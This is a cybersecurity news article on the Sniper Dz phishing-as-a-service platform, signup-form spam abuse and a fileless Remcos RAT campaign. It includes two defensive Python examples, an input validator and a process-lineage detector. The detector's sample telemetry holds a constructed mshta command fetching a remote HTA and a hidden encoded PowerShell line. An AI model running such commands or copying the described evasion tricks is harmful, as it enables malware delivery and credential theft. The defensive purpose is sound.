Over the past year, more than 140,000 phishing websites have been discovered connected to the Sniper Dz Phishing-as-a-Service (PhaaS) platform, highlighting its widespread use by cybercriminals for credential theft.
"For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," said Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov in a technical report.
"Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers."
What makes it even more appealing to criminals is that the services are offered for free. However, the credentials harvested are also stolen by the operators of the PhaaS platform, a method Microsoft refers to as "double theft."
PhaaS platforms have become a popular entry point for aspiring cybercriminals, making it easier for individuals with little technical knowledge to carry out large-scale phishing attacks.
These phishing kits are often sold on Telegram, where dedicated channels offer everything from hosting services to phishing message distribution.
Sniper Dz operates a Telegram channel, created on May 25, 2020, that had over 7,170 subscribers as of October 1, 2024. Interestingly, a day after the Unit 42 report was released, the channel enabled an auto-delete feature that automatically erases posts after one month, likely an attempt to cover tracks, although previous messages remain visible.
The PhaaS platform is accessible on the clearnet, where users can sign up for accounts to "get your scams and hack tools," as advertised on the website.
A video uploaded to Vimeo in January 2021 shows that Sniper Dz provides ready-made scam templates for various websites like Facebook, Instagram, Skype, Yahoo, and PayPal, available in English, Arabic, and French. This video has garnered over 67,000 views.
Additionally, The Hacker News identified tutorial videos on YouTube that guide users through setting up fake landing pages for popular games like PUBG and Free Fire on platforms like Google Blogger. It remains unclear if these YouTubers are connected to Sniper Dz's developers or merely customers.
Sniper Dz has the capability to host phishing pages on its own infrastructure and provide unique links to these pages. These phishing sites are often concealed behind a legitimate proxy server (proxymesh[.]com) to evade detection.
"The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications," the researchers noted.
"This technique helps Sniper Dz protect its backend servers since the victim's browser or security crawlers will only see the proxy server as responsible for loading the phishing payload."
Another option for criminals is downloading phishing page templates as HTML files and hosting them on their own servers. Sniper Dz even offers tools to convert these templates into the Blogger format, allowing phishing pages to be hosted on Blogspot domains.
The stolen credentials are displayed on an admin panel, accessible through the clearnet platform. Unit 42 observed a surge in phishing activity leveraging Sniper Dz, primarily targeting U.S. users, beginning in July 2024.
"Sniper Dz phishing pages exfiltrate victim credentials and track them through centralized infrastructure," said the researchers. "This could be assisting Sniper Dz in collecting credentials stolen by phishers using their platform."
This discovery coincides with Cisco Talos revealing attacks abusing web forms linked to backend SMTP infrastructure, such as account creation pages, to bypass spam filters and distribute phishing emails. These attacks exploit poor input validation to insert malicious links and text.
"Many websites allow users to sign up for accounts, triggering an email back to the user for confirmation," said Talos researcher Jaeson Schultz. "In this case, spammers overload the name field with text and links, which aren't validated, causing spam links to appear in the email."
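To make the input-validation point concrete, here is an added illustration (not code from the article or from Talos) of the signup-confirmation pattern Schultz describes: a weak builder that drops the submitted name straight into the email body, beside a hardened validator that rejects names carrying URLs, line breaks or excessive length before they ever reach the template. The abusive name, the template text and the field limits are constructed for this example.

```python
import re
from typing import Optional

# Constructed sample input: the kind of "name" an abuser submits to an unvalidated
# signup form so that the site's own confirmation email carries their text and link.
ABUSIVE_NAME = "Claim your prize now at https://example.invalid/offer\nReply fast!"
NORMAL_NAME = "Ada Lovelace"

# Constructed plain-text confirmation template; the name is the only user-controlled part.
TEMPLATE = "Hello {name},\n\nThanks for creating an account. Use the link below to confirm.\n"


def build_confirmation_unvalidated(name: str) -> str:
    """Weak version: whatever the user typed becomes part of an email the site sends."""
    return TEMPLATE.format(name=name)


MAX_NAME_LEN = 64  # assumed limit; a display name does not need room for a paragraph
# A display name: starts with a letter, then letters/digits, spaces, apostrophes, hyphens, periods.
NAME_RE = re.compile(r"^[^\W\d_][\w'.\- ]*$")
# Anything that looks like a link or a bare domain has no place in a name field.
URL_LIKE = re.compile(r"(https?://|www\.|[a-z0-9-]+\.[a-z]{2,}/?)", re.IGNORECASE)


def validate_display_name(name: str) -> Optional[str]:
    """Return a normalised name, or None when the value should be rejected outright."""
    name = " ".join(name.split())  # collapse runs of whitespace; this also removes newlines
    if not name or len(name) > MAX_NAME_LEN:
        return None
    if URL_LIKE.search(name):
        return None
    if not NAME_RE.match(name):
        return None
    return name


def build_confirmation_hardened(name: str) -> Optional[str]:
    """Hardened version: refuse to send at all when the name fails validation."""
    clean = validate_display_name(name)
    if clean is None:
        return None
    return TEMPLATE.format(name=clean)


if __name__ == "__main__":
    print(build_confirmation_unvalidated(ABUSIVE_NAME))   # spam link rides the site's email
    print(build_confirmation_hardened(ABUSIVE_NAME))      # None: signup rejected
    print(build_confirmation_hardened(NORMAL_NAME))       # normal greeting
```

Rejecting the request is a deliberate choice over silently stripping the link: a stripped name still lets an abuser push arbitrary prose through the sender's reputation. For HTML-formatted mail the validated name must additionally be escaped at the point of insertion.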
Additionally, a recent email phishing campaign was discovered, leveraging an innocuous Microsoft Excel document to deliver a fileless version of the Remcos RAT, exploiting a security flaw (CVE-2017-0199).
"Opening the Excel file triggers OLE objects to download and execute a malicious HTA application," explained Trellix researcher Trishaan Kalra. "This HTA application launches PowerShell commands that ultimately inject fileless Remcos RAT into a legitimate Windows process."
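The chain Kalra describes (Excel, then an HTA application, then PowerShell) is visible in process-creation telemetry as a parent-child lineage, which is where a defender can catch it. The following is an added detection example, not from the article or Trellix: it walks constructed process-creation events and flags an Office application launching a script host, and a shell whose ancestry runs through a script host back to an Office application. It assumes that HTA files are executed by mshta.exe, and the image paths, PIDs, command lines and URL are constructed placeholders.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / EDR style), reduced to what the rule needs."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry modelling the described chain plus one benign PowerShell launch.
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "EXCEL.EXE invoice.xlsx"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://placeholder.invalid/stage.hta"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc AAAA"),
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerant of either separator."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain from ev's parent up to the root; stops on a missing parent or a PID cycle."""
    chain: List[ProcEvent] = []
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect_office_hta_chain(events: List[ProcEvent]) -> List[dict]:
    """Return one alert per event matching either rule, in event order."""
    by_pid = {e.pid: e for e in events}
    alerts: List[dict] = []
    for ev in events:
        name = basename(ev.image)
        names = [basename(a.image) for a in ancestors(ev, by_pid)]
        # Rule 1: an Office application directly launching a script host.
        if name in SCRIPT_HOSTS and names and names[0] in OFFICE_APPS:
            alerts.append({"rule": "office_spawns_script_host", "pid": ev.pid, "chain": [name] + names})
        # Rule 2: a shell whose lineage contains a script host with an Office app above it.
        if name in SHELLS:
            host_positions = [i for i, n in enumerate(names) if n in SCRIPT_HOSTS]
            if host_positions and any(n in OFFICE_APPS for n in names[host_positions[0] + 1:]):
                alerts.append({"rule": "office_script_host_shell", "pid": ev.pid, "chain": [name] + names})
    return alerts


if __name__ == "__main__":
    for alert in detect_office_hta_chain(EVENTS):
        print(alert["rule"], alert["pid"], " <- ".join(alert["chain"]))
```

Rule 1 fires on the HTA launch before any PowerShell runs, which matters because the payload injection happens in the next step; rule 2 survives one or two intermediate processes in the lineage, since it checks ancestry rather than the immediate parent. The benign PowerShell started from explorer.exe does not match either.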
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067